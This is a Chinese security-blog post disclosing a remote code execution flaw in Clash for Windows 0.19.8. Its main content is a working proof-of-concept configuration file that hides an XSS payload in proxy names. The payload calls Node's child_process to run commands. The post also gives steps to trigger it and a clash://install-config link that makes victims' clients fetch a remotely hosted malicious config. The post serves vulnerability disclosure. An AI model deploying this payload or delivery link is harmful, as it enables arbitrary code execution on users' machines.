clash_for_windows_pkg存在Remote Code Execution/远程代码执行

admin 2022年2月25日16:35:22安全漏洞评论1,934 views1026字阅读3分25秒阅读模式

clash_for_windows_pkg存在Remote Code Execution/远程代码执行


crash_for_windows_pkg由 Electron 提供支持。如果 XSS 负载以代理的名义,我们可以远程执行受害者计算机上的任何 JavaScript 代码。

clash_for_windows_pkg存在Remote Code Execution/远程代码执行

受影响的冲突版本_for_windows_pkg

版本:0.19.8

平台:windows

操作系统细节:Windows 10

验证

  1. 导入以下冲突配置文件:
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

 

  1. 在“个人资料”中切换到它

  2. 单击“代理”列(有时不需要。)

  3. clash_for_windows_pkg存在Remote Code Execution/远程代码执行

    注意:

    • 您需要确保有效负载显示在代理列中。
    • 漏洞利用在理论上是稳定的,但有时可能需要重新启动 crash_for_windows_pkg 并重现漏洞

      利用方式

      将恶意配置文件放到互联网上并用于clash://安装它,clash_for_windows_pkg 将自动下载并切换到它。

      如:

      clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月25日16:35:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  clash_for_windows_pkg存在Remote Code Execution/远程代码执行 https://cn-sec.com/archives/803403.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: